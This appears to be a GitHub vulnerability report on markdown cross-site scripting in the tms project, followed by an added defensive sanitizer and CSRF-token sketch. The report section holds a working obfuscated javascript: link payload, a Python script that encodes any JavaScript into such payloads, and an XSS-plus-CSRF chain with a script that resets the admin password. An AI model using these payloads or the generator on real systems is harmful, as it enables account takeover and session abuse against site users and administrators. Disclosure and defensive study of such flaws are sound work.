
There are cross site scripting vulnerabilities in tms #19

@WDLegend

Description


[Suggested description]
I found many cross site scripting (XSS) vulnerabilities in tms (markdown XSS). Every edit or comment page with markdown may have this vulnerability. There are too many to list.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[vulnerability proof]
Every markdown page may have XSS. Here I chose this page:
http://localhost:8080/page/index.html#/chat/@super

Enter the poc here and send the message.

[click here](javascript:{onerror=eval}throw'=eval\x28String.fromCharCode\x2897,108,101,114,116,40,49,41\x29\x29')

The browser alerts 1.

[Exploit scripts]:
code = """alert(1)"""  # js code here
result = ''

ascii_values = [str(ord(char)) for char in code]

for value in ascii_values:
    result += (value + ',')

result = result[:-1]
final = "[click here](javascript:{onerror=eval}throw'=" + f"eval\\x28String.fromCharCode\\x28{result}\\x29\\x29')"
print(final)

[Repair Suggestion]
Change to another Markdown component, or add a filter in the backend to check for XSS attacks when storing into MySQL.

[With CSRF vulnerability]
There is a CSRF vulnerability; we could use XSS + CSRF to change the admin's password.
This is the update-password HTTP packet:

POST /admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 32
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099; JSESSIONID=9F0DF9ABD117D0289143D1B75E19E15A; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1701867716
Connection: close

username=super&password=12345678

Exploit script here:

code = """var xhr = new XMLHttpRequest();
var url = 'http://localhost:8080/admin/user/update2';
xhr.onreadystatechange = function() {
    if (xhr.readyState === XMLHttpRequest.DONE) {
        if (xhr.status === 200) {
            console.log('success!');
            console.log(xhr.responseText);
        } else {
            console.error('failed' + xhr.status);
        }
    }
};
xhr.open('POST', url, true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
var postData = 'username=super&password=hacker123';
xhr.send(postData);"""  # js code here
result = ''

ascii_values = [str(ord(char)) for char in code]

for value in ascii_values:
    result += (value + ',')

result = result[:-1]
final = "[click here](javascript:{onerror=eval}throw'=" + f"eval\\x28String.fromCharCode\\x28{result}\\x29\\x29')"
print(final)

Send the message and open the console. Click the message.

Log out and log in again; the password has changed!
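Added example, not code from the tms project or from the reporter: a defensive sketch of the two fixes this report points at. The markdown link payload works because the renderer emits whatever scheme the author wrote into the link's href, so the check below allowlists link schemes on the decoded href before the anchor is built, and degrades an unsafe link to plain escaped text. The second function is a synchronizer-token check of the kind /admin/user/update2 lacks. It is written in JavaScript because the XSS fires in the browser-side markdown renderer; all function names, the base URL and the sample links are assumptions made for this example.

```javascript
// Added example (not tms project code). Function names, the dummy base URL
// and the sample links below are constructed for illustration.

// Only these URL schemes may appear in a rendered markdown link; anything
// else (javascript:, data:, vbscript:, ...) is rejected.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Returns the href when its scheme is allowed (or the href is relative),
// otherwise null. Call it on the *decoded* href the markdown parser yields,
// so entity and backslash escapes in the source text are already resolved.
function safeLinkHref(href) {
  // Browsers skip C0 control characters and tabs/newlines when reading the
  // scheme, so strip them before parsing instead of matching raw text.
  const cleaned = String(href).replace(/[\u0000-\u001f\u007f]/g, '').trim();
  let parsed;
  try {
    // A relative href resolves against the dummy base and inherits https:;
    // an absolute href keeps its own scheme, lowercased by the URL parser.
    parsed = new URL(cleaned, 'https://base.invalid/');
  } catch (e) {
    return null; // unparsable: treat as unsafe
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? cleaned : null;
}

// Render one markdown link. An unsafe href degrades to escaped link text
// rather than an anchor, so the message still displays but cannot execute.
function renderLink(text, href) {
  const safe = safeLinkHref(href);
  if (safe === null) {
    return escapeHtml(text);
  }
  return `<a href="${escapeHtml(safe)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
}

// Synchronizer-token check for state-changing endpoints such as the
// password update: the token bound to the session must equal the token sent
// with the request. Compared in constant time so length/prefix leaks do not
// help an attacker. Note this stops cross-site forms only; script already
// running on the same origin (the XSS above) can read the token, which is
// why removing the XSS is what actually breaks the reported chain.
function csrfTokenValid(sessionToken, requestToken) {
  if (typeof sessionToken !== 'string' || typeof requestToken !== 'string') return false;
  if (sessionToken.length !== requestToken.length) return false;
  let diff = 0;
  for (let i = 0; i < sessionToken.length; i++) {
    diff |= sessionToken.charCodeAt(i) ^ requestToken.charCodeAt(i);
  }
  return diff === 0;
}

// Constructed sample links: the scheme shapes a sanitizer must handle.
const SAMPLE_LINKS = [
  ['click here', 'javascript:alert(1)'],
  ['mixed case', 'JaVaScRiPt:alert(1)'],
  ['split scheme', '\tjava\nscript:alert(1)'],
  ['data url', 'data:text/html,x'],
  ['repo', 'https://github.com/xiweicheng/tms'],
  ['relative', '/page/index.html'],
  ['mail', 'mailto:admin@example.invalid'],
];

for (const [text, href] of SAMPLE_LINKS) {
  console.log(JSON.stringify(href), '=>', renderLink(text, href));
}
```

Running the block prints each sample href beside its rendered form: the four script and data links come out as bare text, the three benign links as anchors. Wiring it into a renderer means calling `safeLinkHref` on the final href string, after markdown escapes and HTML entities are decoded, and never before.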
